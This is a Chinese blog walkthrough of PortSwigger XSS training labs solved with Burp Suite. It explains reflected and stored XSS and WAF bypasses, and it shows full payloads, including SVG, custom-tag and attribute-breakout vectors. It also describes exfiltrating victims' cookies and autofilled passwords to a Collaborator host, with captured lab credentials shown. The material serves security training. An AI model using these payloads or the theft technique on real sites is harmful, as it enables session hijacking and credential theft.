【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）

前言：

介绍：

博主：网络安全领域狂热爱好者（承诺在CSDN永久无偿分享文章）。

殊荣：CSDN网络安全领域优质创作者，2022年双十一业务安全保卫战-某厂第一名，某厂特邀数字业务安全研究员，edusrc高白帽，vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长：对于技术、工具、漏洞原理、黑产打击的研究。

C站缘：C站的前辈，引领我度过了一个又一个技术的瓶颈期、迷茫期。

导读：

面向读者：对于网络安全方面的学者。

本文知识点（读者自测）：

（1）HTML标记之间的XSS（√）

（2）HTML标记属性中的XSS（√）

（3）从其他数据库表中检索数据（√）

（4）客户端模板注入（√）

一、跨站点脚本（XSS）

1、简述：

2、原理：

3、XSS验证

3、XSS攻击类型

二、反射XSS

1、简述：

2、示例：

3、涉及实验：

实验1：将XSS反射到HTML上下文中，不进行任何编码

4、反射的XSS攻击的影响

实验14：利用跨站点脚本窃取Cookie

实验15：利用跨站点脚本来捕获密码

实验16：利用XSS实现CSRF

三、不同上下文中的反射XSS

1、简述：

2、HTML标记之间的XSS

实验2：将XSS存储到HTML上下文中，不进行任何编码

实验17：将XSS反射到HTML上下文中，大多数标记和属性被阻止

实验18：将XSS反射到HTML上下文中，除自定义标记外，所有标记都被阻止

实验25：具有事件处理程序和 href 已阻止属性

实验19：允许使用一些SVG标记的反射XSS

3、HTML标记属性中的XSS

实验7：将XSS反射到带尖括号的HTML编码属性中

实验8：将XSS存储到锚中 href 带双引号的属性HTML编码

实验20：规范链接标记中反射的XSS

4、终止现有脚本

实验21：将XSS反射到JavaScript字符串中，并使用单引号和反斜杠进行转义

实验9：将XSS反射到带有尖括号的JavaScript字符串HTML编码

实验22：将XSS反射到JavaScript字符串中，使用尖括号和双引号HTML编码并转义单引号

实验26：JavaScript URL中反射的XSS，其中一些字符被阻止

实验23：将XSS存储到onclick事件中，使用尖括号和双引号HTML编码，使用单引号和反斜杠转义

实验24：将XSS反射到模板文本中，带有尖括号、单引号、双引号、反斜杠和反记号

四、客户端模板注入

1、简述：

2、AngularJS沙盒

实验27：反射的XSS，带AngularJS沙箱转义，不带字符串

3、AngularJS CSP旁路

实验28：反射XSS与AngularJS沙箱转义和CSP

一、跨站点脚本（XSS）

1、简述：

1、跨站点脚本（也称为XSS）是一个Web安全漏洞，使得攻击者能够破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略，该策略旨在将不同的网站彼此隔离。跨站点脚本漏洞通常允许攻击者伪装成受害用户，执行用户能够执行的任何操作，以及访问用户的任何数据。如果受害用户拥有应用程序内的特权访问权限，则攻击者可能能够完全控制应用程序的所有功能和数据

2、原理：

操纵易受攻击的网站，以便向用户返回恶意JavaScript。当恶意代码在受害者的浏览器中执行时，攻击者可以完全破坏其与应用程序的交互

3、XSS验证

1、通过注入一个有效负载来确认大多数类型的XSS漏洞，该有效负载会导致浏览器执行某些任意JavaScript。使用alert()函数，因为它简短、无害，并且在成功调用时很难错过。实际上，大多数XSS实验都是通过调用alert()在模拟受害者的浏览器

2、如果使用Chrome的话，会有一个问题。从2021年7月开始，跨源iframe被禁止调用alert（）。由于这些用于构造一些更高级的XSS攻击，因此有时需要使用替代PoC有效负载。在这种情况下，建议使用print（）函数

3、XSS攻击类型

主要有三种类型：

    1、反射的XSS，其中恶意脚本来自当前HTTP请求。
    2、存储XSS，其中恶意脚本来自网站的数据库。
    3、基于DOM的XSS，其中漏洞存在于客户端代码而不是服务器端代码中。

二、反射XSS

1、简述：

当应用程序接收HTTP请求中的数据并以不安全的方式将该数据包含在即时响应中时，就会出现反射的跨站点脚本（或XSS）

2、示例：
1、（插入框）网站具有搜索功能，该功能接收用户在URL参数中提供的搜索项：
https://insecure-website.com/search?term=gift

2、（回显功能）应用产品在对此URL的响应中回显提供的搜索词：
You searched for: gift

3、（数据处理不严谨/可绕过）假设应用程序不执行任何其他数据处理，攻击者可以构建如下攻击：
https://insecure-website.com/search?term=

4、（反射XSS）此URL将导致以下响应：
You searched for: 
如果应用程序的另一个用户请求攻击者的URL，则攻击者提供的脚本将在受害用户的浏览器中，在他们与应用程序的会话上下文中执行

3、涉及实验：

实验1：将XSS反射到HTML上下文中，不进行任何编码

实验1：将XSS反射到HTML上下文中，不进行任何编码

信息：

本实验包含搜索功能中的一个简单反映的跨站点脚本漏洞。

完成实验：执行调用alert函数的跨站点脚本攻击。

part1:

（自己储备好各种XSS的payload）

见框就插（有时候可能会在数据包里面插）

4、反射的XSS攻击的影响

1、如果攻击者可以控制在受害者浏览器中执行的脚本，则通常可以完全危害该用户。
攻击者可以：
    1、在应用程序中执行用户可以执行的任何操作。
    2、查看用户能够查看的任何信息。
    3、修改用户能够修改的任何信息。
    4、发起与其他应用程序用户的交互，包括恶意攻击，这些攻击看起来似乎来自最初的受害者用户。
2、攻击者可以通过各种方式诱使受害用户发出他们控制的请求，从而传递反射的XSS攻击。这包括在攻击者控制的网站或允许生成内容的其他网站上放置链接，或者通过电子邮件、推文或其他消息发送链接。攻击可能直接针对已知用户，也可能不加区别地攻击应用程序的任何用户

3、攻击需要外部传递机制，这意味着反射的XSS的影响通常没有存储的XSS严重，存储的XSS可以在易受攻击的应用程序本身内传递自包含攻击。

4、利用跨站点脚本窃取Cookie
窃取cookie是利用XSS的传统方式。大多数Web应用程序使用Cookie进行会话处理。可以利用跨站点脚本漏洞将受害者的Cookie发送到您自己的域，然后手动将Cookie注入浏览器并模拟受害者。

在实践中，这种方法有一些明显的局限性：
    1、受害者可能没有登录。
    2、许多应用程序使用 仅HttpOnly旗帜。
    3、会话可能会被锁定到其他因素，如用户的IP地址。
    4、会话可能会在您能够劫持它之前超时
涉及实验：
实验14：利用跨站点脚本窃取Cookie

5、利用跨站点脚本来捕获密码

————

（1）许多用户都有自动填充密码的密码管理器。可以通过创建密码输入、阅读自动填充的密码并将其发送到我们的域来利用这一点。此技术避免了与窃取Cookie相关的大多数问题，甚至可以访问受害者重用相同密码的所有其他帐户。

————

（2）这种技术的主要缺点是，它只适用于拥有执行密码自动填充的密码管理器的用户。(如果用户没有保存密码，仍然可以尝试通过现场网络钓鱼攻击获取其密码）

————

涉及实验：
实验15：利用跨站点脚本来捕获密码

6、利用跨站点脚本执行CSRF

————

1、根据目标网站，可能会让受害者发送消息，接受好友请求，提交一个后门到源代码库，或转移一些比特币。

————

2、某些网站允许登录用户更改其电子邮件地址，而无需重新输入密码。如果发现了XSS漏洞，可以让它触发此功能，将受害者的电子邮件地址更改为能控制的地址，然后触发密码重置以获得对帐户的访问权限

————

3、这种类型的利用通常称为跨站点请求伪造（CSRF），这有点令人困惑，因为CSRF也可能作为独立漏洞出现。当CSRF作为独立漏洞出现时，可以使用诸如反CSRF令牌之类的策略对其进行修补。但如果同时存在XSS漏洞，这些策略将不提供任何保护。

————

涉及实验：
实验16：利用XSS实现CSRF

实验14：利用跨站点脚本窃取Cookie

信息：

本实验在博客评论函数中包含一个已存储的XSS漏洞。模拟的受害者用户查看所有发表的评论

解决实验：利用此漏洞来泄漏受害者的会话cookie，然后使用此cookie来模拟受害者

part1:

使用Burp Suite Professional，转到Collaborator选项卡。
单击“复制到剪贴板”将唯一的Burp Collaborator有效负载复制到剪贴板
jg3vbb0cmdrxsi0uyp9h9lc47vdl1a.burpcollaborator.net
part2:

插入XSS

在博客评论中提交以下有效负载，在指定位置插入您的Burp Collaborator子域：
我的是：
此脚本将使查看评论的任何人向公共Collaborator服务器上的您的子域发出包含其cookie的POST请求

part3：

查看信息

点击刷新，看到HTTP交互
记下POST主体中受害者cookie的值
session=9Npstu0CedDyYYZvFUNgA0okHLfpWyYB
part4：

解决实验

重新加载主博客页面，使用Burp Proxy或Burp Repeater将会话cookie替换为在Burp Collaborator中捕获的cookie

其实正常情况下，修改某个数据，可能就要一路修改下去

实验15：利用跨站点脚本来捕获密码

信息：

本实验在博客评论函数中包含一个已存储的XSS漏洞。模拟的受害者用户查看所有发表的评论

解决实验：利用此漏洞来窃取受害者的用户名和密码，然后使用这些凭据登录到受害者的帐户。

part1:

使用Burp Suite Professional，转到Collaborator选项卡。
单击"复制到剪贴板"将唯一的Burp Collaborator有效负载复制到剪贴板
qqkybew56kd84w6ny0l6yjhpfgl69v.burpcollaborator.net
part2:

插入XSS

在博客评论中提交以下有效负载（在指定位置插入您的Burp Collaborator子域）
我的是：
此脚本将使查看评论的任何人向公共Collaborator服务器的子域发出包含其用户名和密码的POST请求

part3：

返回Collaborator选项卡，然后刷新，看到HTTP交互
记下POST主体中受害者的用户名和密码的值。
administrator:9yl3ow6km9ix24rkz7mk
part4：

解决实验

进行登陆操作

登陆成功完成实验

实验16：利用XSS实现CSRF

信息：

本实验在博客评论函数中包含一个已存储的XSS漏洞。要解决此实验问题，请利用此漏洞执行CSRF攻击，并更改查看博客帖子评论的用户的电子邮件地址。

已有账号：wiener:peter

part1:

登陆已有账号测试功能

在HTTP历史记录中找到数据包

part2：

构造XSS

攻击需要加载用户帐户页面，提取CSRF令牌，然后使用该令牌更改受害者的电子邮件地址
part3:

插入XSS

在博客评论中提交payload

这将使任何查看评论的人发出POST请求，将其电子邮件地址更改为[email protected]

三、不同上下文中的反射XSS

1、简述：

1、反射数据在应用程序响应中的位置、任何验证或其他处理决定了利用它所需的有效负载类型，并且还可能影响漏洞的影响。

2、当测试反射和存储的XSS时，一个关键任务是识别XSS上下文：
    1、响应中出现攻击者可控制数据的位置。
    2、应用程序对该数据执行的任何输入验证或其他处理。

2、HTML标记之间的XSS

当XSS上下文是HTML标记之间的文本时，需要引入一些新的HTML标记来触发JavaScript的执行。
执行JavaScript的一些有用方法包括：
涉及实验：
实验1：将XSS反射到HTML上下文中，不进行任何编码（前文已解决）
实验2：将XSS存储到HTML上下文中，不进行任何编码
实验17：将XSS反射到HTML上下文中，大多数标记和属性被阻止
实验18：将XSS反射到HTML上下文中，除自定义标记外，所有标记都被阻止
实验25：具有事件处理程序和 href 已阻止属性
实验19：允许使用一些SVG标记的反射XSS

实验2：将XSS存储到HTML上下文中，不进行任何编码

信息：

本实验的评论功能中存在一个已存储的跨站点脚本漏洞。

要完成此实验，请提交一条评论，以便在查看博客帖子时调用alert函数

part1:

（自己储备好各种XSS的payload）

见框就插（有时候可能会在数据包里面插）
返回评论区会弹窗

实验17：将XSS反射到HTML上下文中，大多数标记和属性被阻止

信息：

1、本实验在搜索功能中包含一个反映的XSS漏洞，但使用Web应用程序防火墙（WAF）来防范常见的XSS向量。

2、解决实验：执行跨站点脚本攻击，绕过WAF并调用print()函数

3、访问XSS备忘单并单击复制保存（测试过滤器的时候用的Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy）

part1:

注入标准XSSpayload

发现失败

part2:

分析数据包，并发送到Burp Intruder

在Burp Intruder中的位置选项卡中，单击"清除§"。将搜索项的值替换为：<>
将光标放在尖括号之间，点击"Add §"（添加§）两次，创建有效载荷位置。搜索项的值现在应如下所示：<§§>

测试哪些标记和属性被阻止

（Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy）

访问XSS 备忘单并单击“Copy tags to clipboard”

在Burp Intruder的"有效负载"选项卡中，单击"粘贴"将标记列表粘贴到有效负载列表中。单击"开始攻击"。

攻击完成后，查看结果，所有有效负载都导致HTTP 400响应，但body有效负载除外，它导致200响应

part3:

返回Burp Intruder中的Positions选项卡，将搜索词替换为：

将光标放在=字符前，点击"Add §"两次，创建有效载荷位置

访问XSS 备忘单并单击“Copy events to clipboard”

Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy

在Burp Intruder的"有效负载"选项卡中，单击"清除"以删除以前的有效负载。然后单击"粘贴"将属性列表粘贴到有效负载列表中。单击"开始攻击"。

攻击完成后，查看结果。请注意，所有有效负载都会导致HTTP 400响应，只有3个负载导致200响应

payload：
">
URL编码后：
%22%3E%3Cbody%20onresize=print()%3E

part4:

这里使用onresize负载

转到漏洞利用服务器并粘贴以下代码，将YOUR-LAB-ID替换为自己实验室ID：

（千万别填错了）



我的是：
<iframe src="https://0ae800840376b1b2c158a3ec00860058.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'></code></pre> 
   <p>顺序单击"存储"和"向受害者发送利用漏洞攻击"</p> 
   <p><a href="http://img.e-com-net.com/image/info8/df05dd01f18645d199a6bdf7b4cbd9cf.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第33张图片" height="352" src="http://img.e-com-net.com/image/info8/df05dd01f18645d199a6bdf7b4cbd9cf.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p> <a href="http://img.e-com-net.com/image/info8/079d106721c54c9e8e0894bd21ef42a4.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第34张图片" height="171" src="http://img.e-com-net.com/image/info8/079d106721c54c9e8e0894bd21ef42a4.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p> 点击view exploit可以看到print效果</p> 
   <p><a href="http://img.e-com-net.com/image/info8/bbd20ed35f8b49b7a9fe6094b3c58342.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第35张图片" height="352" src="http://img.e-com-net.com/image/info8/bbd20ed35f8b49b7a9fe6094b3c58342.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C18%EF%BC%9A%E5%B0%86XSS%E5%8F%8D%E5%B0%84%E5%88%B0HTML%E4%B8%8A%E4%B8%8B%E6%96%87%E4%B8%AD%EF%BC%8C%E9%99%A4%E8%87%AA%E5%AE%9A%E4%B9%89%E6%A0%87%E8%AE%B0%E5%A4%96%EF%BC%8C%E6%89%80%E6%9C%89%E6%A0%87%E8%AE%B0%E9%83%BD%E8%A2%AB%E9%98%BB%E6%AD%A2"><span style="background-color:#a2e043;">实验18：将XSS反射到HTML上下文中，除自定义标记外，所有标记都被阻止</span></h2> 
   <p>信息：</p> 
   <p>本实验阻止除自定义标记外的所有HTML标记。</p> 
   <p>解决实验：执行跨站点脚本攻击，注入自定义标记并自动向document.cookie发出警报</p> 
   <hr> 
   <p>part1：</p> 
   <p>转到漏洞利用服务器</p> 
   <p><a href="http://img.e-com-net.com/image/info8/50b4ef2f416e4cb0986c74b2e69b6244.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第36张图片" height="270" src="http://img.e-com-net.com/image/info8/50b4ef2f416e4cb0986c74b2e69b6244.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p>payload：</p> 
   <pre><code>payload：
<xss id=x onfocus=alert(document.cookie) tabindex=1>
此注入创建一个ID为x的自定义标记，其中包含一个触发alert函数的onfocus事件处理程序。页面加载后，URL末尾的散列将立即关注此元素，从而导致调用alert负载。

url编码：
%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E</code></pre> 
   <p></p> 
   <p>并粘贴以下代码，将YOUR-LAB-ID替换为自己实验室ID：</p> 
   <pre><code><script>
location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

我的是：
<script>
location = 'https://0ad40062044c7721c68463dc008d00f3.web-security-academy.net//?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script></code></pre> 
   <p>单击“存储”和“向受害者发送利用漏洞攻击”</p> 
   <p>（View exploit可以查看）</p> 
   <p><a href="http://img.e-com-net.com/image/info8/608c9ca3ee034bf78d55920a586bf3a4.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第37张图片" height="356" src="http://img.e-com-net.com/image/info8/608c9ca3ee034bf78d55920a586bf3a4.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> <a href="http://img.e-com-net.com/image/info8/0cc8a5a13e784593b5b2f6354816fa39.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第38张图片" height="291" src="http://img.e-com-net.com/image/info8/0cc8a5a13e784593b5b2f6354816fa39.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C25%EF%BC%9A%E5%85%B7%E6%9C%89%E4%BA%8B%E4%BB%B6%E5%A4%84%E7%90%86%E7%A8%8B%E5%BA%8F%E5%92%8C%20href%20%E5%B7%B2%E9%98%BB%E6%AD%A2%E5%B1%9E%E6%80%A7"><span style="background-color:#a2e043;">实验25：具有事件处理程序和 href 已阻止属性</span></h2> 
   <p>信息：</p> 
   <p>本实验包含一个带有白名单标记的反射XSS漏洞，但所有事件和锚点href属性都被阻止。</p> 
   <p>要解决实验问题，请执行跨站点脚本攻击，该攻击注入一个向量，单击该向量会调用alert 函数。</p> 
   <p>需要用单词"Click"标记向量，以便引导模拟实验室用户单击向量。例如：<a href="">Click me</a></p> 
   <hr> 
   <p>part1：</p> 
   <p>将编码后的payload标签插入到页面中</p> 
   <pre><code>payload：
%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E

URL编码后：
<svg><a><animate+attributeName=href+values=javascript:alert(1)+/><text+x=20+y=20>Click me</text></a></code></pre> 
   <p></p> 
   <p>访问以下URL（将YOUR-LAB-ID替换为自己的实验室ID）</p> 
   <pre><code>https://YOUR-LAB-ID.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E

我的是：
https://0a710019043e9406c0f8452600a40018.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E</code></pre> 
   <p></p> 
   <p><a href="http://img.e-com-net.com/image/info8/6031a7a1edcd4d79bbf9c59bff806504.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第39张图片" height="235" src="http://img.e-com-net.com/image/info8/6031a7a1edcd4d79bbf9c59bff806504.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C19%EF%BC%9A%E5%85%81%E8%AE%B8%E4%BD%BF%E7%94%A8%E4%B8%80%E4%BA%9BSVG%E6%A0%87%E8%AE%B0%E7%9A%84%E5%8F%8D%E5%B0%84XSS"><span style="background-color:#a2e043;">实验19：允许使用一些SVG标记的反射XSS</span></h2> 
   <p>信息：</p> 
   <p>本实验有一个简单的反射XSS漏洞。该站点阻止了常见标记，但遗漏了一些SVG标记和事件。</p> 
   <p>要完成实验，请执行调用alert()函数的跨站点脚本攻击。</p> 
   <hr> 
   <p>part1:</p> 
   <p>输入框插入标准XSSpayload</p> 
   <pre><code><img src=1 onerror=alert(1)></code></pre> 
   <p></p> 
   <p>发现失败，被拦截</p> 
   <p><a href="http://img.e-com-net.com/image/info8/c777e4803ebc4bf0a72bb12741271612.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第40张图片" height="222" src="http://img.e-com-net.com/image/info8/c777e4803ebc4bf0a72bb12741271612.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <hr> 
   <p>part2:</p> 
   <p>分析数据包，并发送到Burp Intruder</p> 
   <p><a href="http://img.e-com-net.com/image/info8/c6db357559084ab893871845e552b9e7.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第41张图片" height="482" src="http://img.e-com-net.com/image/info8/c6db357559084ab893871845e552b9e7.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p>在Burp Intruder中的位置选项卡中，单击"清除§"。将搜索项的值替换为：<><br> 将光标放在尖括号之间，点击"Add §"（添加§）两次，创建有效载荷位置。搜索项的值现在应如下所示：<§§></p> 
   <p></p> 
   <p><a href="http://img.e-com-net.com/image/info8/f9a71c2b0cbc412f9b49581cf7344ec6.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第42张图片" height="482" src="http://img.e-com-net.com/image/info8/f9a71c2b0cbc412f9b49581cf7344ec6.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p> 测试哪些标记和属性被阻止</p> 
   <p> （Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy）</p> 
   <p>访问XSS 备忘单并单击“Copy tags to clipboard”</p> 
   <p><a href="http://img.e-com-net.com/image/info8/6282899d4d4a4b0f8ec73c170a87ae37.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第43张图片" height="430" src="http://img.e-com-net.com/image/info8/6282899d4d4a4b0f8ec73c170a87ae37.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><br> 在Burp Intruder的"有效负载"选项卡中，单击"粘贴"将标记列表粘贴到有效负载列表中。单击"开始攻击"。</p> 
   <p><a href="http://img.e-com-net.com/image/info8/4bd86f61db184fb196b7c4531a91b0f7.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第44张图片" height="482" src="http://img.e-com-net.com/image/info8/4bd86f61db184fb196b7c4531a91b0f7.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> 攻击完成后，查看结果，所有有效负载都导致HTTP 400响应，但<svg>,  <animatetransform>,  <title>、<image>有效负载除外，它导致200响应</p> 
   <p><a href="http://img.e-com-net.com/image/info8/b3f9d0b96c574c71a93a2415a4437ffa.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第45张图片" height="605" src="http://img.e-com-net.com/image/info8/b3f9d0b96c574c71a93a2415a4437ffa.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p></p> 
   <p></p> 
   <hr> 
   <p>part3:</p> 
   <p>返回Burp Intruder中的Positions选项卡，将搜索词替换为：</p> 
   <pre><code><svg><animatetransform%20=1></code></pre> 
   <p>将光标放在=字符前，点击"Add §"两次，创建有效载荷位置</p> 
   <pre><code><svg><animatetransform%20§§=1></code></pre> 
   <p> <a href="http://img.e-com-net.com/image/info8/ac6b6c6a27c04a4c873282b21629170e.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第46张图片" height="482" src="http://img.e-com-net.com/image/info8/ac6b6c6a27c04a4c873282b21629170e.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
   <p></p> 
   <p>访问XSS 备忘单并单击“Copy events to clipboard”</p> 
   <p>Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy</p> 
   <p><a href="http://img.e-com-net.com/image/info8/bf9364d1dfd34f8ea38c1a2fa316edb4.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第47张图片" height="415" src="http://img.e-com-net.com/image/info8/bf9364d1dfd34f8ea38c1a2fa316edb4.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> 在Burp Intruder的"有效负载"选项卡中，单击"清除"以删除以前的有效负载。然后单击"粘贴"将属性列表粘贴到有效负载列表中。单击"开始攻击"。</p> 
   <p><a href="http://img.e-com-net.com/image/info8/b4d1969d30334c728824049a07d985f7.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第48张图片" height="452" src="http://img.e-com-net.com/image/info8/b4d1969d30334c728824049a07d985f7.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p>攻击完成后，查看结果。除了onbegin有效负载导致200响应之外，所有有效负载都导致HTTP 400响应。</p> 
   <p></p> 
   <p><a href="http://img.e-com-net.com/image/info8/fca9e71ed0884db59ee1ef40715478ef.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第49张图片" height="605" src="http://img.e-com-net.com/image/info8/fca9e71ed0884db59ee1ef40715478ef.jpg" width="650" style="border:1px solid black;"></a></p> 
   <pre><code>payload：
"><svg><animatetransform onbegin=alert(1)>

URL编码后：
%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E</code></pre> 
   <hr> 
   <p> part4:</p> 
   <p>在浏览器中访问以下URL，确认已调用alert()函数且实验已解决：</p> 
   <p>（将YOUR-LAB-ID替换为自己实验室ID）</p> 
   <pre><code>https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

我的是：
https://0a7400d80446bb60c2e925bb00a80098.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E</code></pre> 
   <p><a href="http://img.e-com-net.com/image/info8/b4e12dfe760e46548792ba950a672f64.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第50张图片" height="363" src="http://img.e-com-net.com/image/info8/b4e12dfe760e46548792ba950a672f64.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><a href="http://img.e-com-net.com/image/info8/c6b00ba09ec44aa4ada1d2c0aac282e0.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第51张图片" height="253" src="http://img.e-com-net.com/image/info8/c6b00ba09ec44aa4ada1d2c0aac282e0.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="3%E3%80%81HTML%E6%A0%87%E8%AE%B0%E5%B1%9E%E6%80%A7%E4%B8%AD%E7%9A%84XSS"><span style="background-color:#a2e043;">3、HTML标记属性中的XSS</span></h2> 
   <p>1、当XSS上下文进入HTML标记属性值时，有时可以终止属性值，关闭标记，并引入一个新的标记。</p> 
   <pre><code>例如：
"><script>alert(document.domain)</script></code></pre> 
   <p>更常见的是尖括号被阻塞或编码，因此输入无法脱离它所在的标记。如果可以终止属性值，通常可以引入一个新属性来创建可编写脚本的上下文，如事件处理程序。</p> 
   <pre><code>例如：
" autofocus onfocus=alert(document.domain) x="

上面的有效负载创建了一个onfocus事件，当元素接收到焦点时，该事件将执行JavaScript，并且还添加了autofocus属性，以尝试自动触发onfocus事件，而无需任何用户交互。最后，它添加了x=”，以适当地修复以下标记</code></pre> 
   <p>涉及实验：</p> 
   <p>实验7：将XSS反射到带尖括号的HTML编码属性中</p> 
   <hr> 
   <p>2、有时候XSS上下文是一种HTML标记属性，它本身可以创建一个脚本上下文。在这里可以执行JavaScript而无需终止属性值。</p> 
   <pre><code>例如，如果XSS上下文位于href属性，则可以使用 javascript语言执行脚本的伪协议：
<a href="javascript:alert(document.domain)"></code></pre> 
   <p>涉及实验：<br> 实验8：将XSS存储到锚中 href 带双引号的属性HTML编码</p> 
   <hr> 
   <p>3、可能一些网站对尖括号进行编码，但仍然允许注入属性。有时即使在通常不会自动触发事件的标记（如规范标记）中，这些注入也是可能的。可以使用access keys和Chrome上的用户交互来利用此行为。</p> 
   <pre><code>access keys允许提供引用特定元素的键盘快捷键。该accesskey属性允许您定义一个字母，当该字母与其他键（这些键在不同的平台上会有所不同）一起按下时，将引发事件</code></pre> 
   <p>涉及实验：</p> 
   <p>实验20：规范链接标记中反射的XSS</p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C7%EF%BC%9A%E5%B0%86XSS%E5%8F%8D%E5%B0%84%E5%88%B0%E5%B8%A6%E5%B0%96%E6%8B%AC%E5%8F%B7%E7%9A%84HTML%E7%BC%96%E7%A0%81%E5%B1%9E%E6%80%A7%E4%B8%AD"><span style="background-color:#a2e043;">实验7：将XSS反射到带尖括号的HTML编码属性中</span></h2> 
   <p>信息：</p> 
   <p>此实验包含搜索博客功能中的一个反映的跨站点脚本漏洞，其中尖括号是HTML编码的。要完成此实验，请执行跨站点脚本攻击，注入属性并调用alert函数。</p> 
   <hr> 
   <p>part1：</p> 
   <p>在搜索框中提交一个随机的字母数字字符串，然后使用Burp Suite拦截搜索请求并将其发送到Burp Repeater</p> 
   <p><a href="http://img.e-com-net.com/image/info8/59484e0e0edd4af9be1fe7d12fc7c303.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第52张图片" height="419" src="http://img.e-com-net.com/image/info8/59484e0e0edd4af9be1fe7d12fc7c303.jpg" width="650" style="border:1px solid black;"></a><br> 观察到随机字符串已反映在带引号的属性中</p> 
   <p></p> 
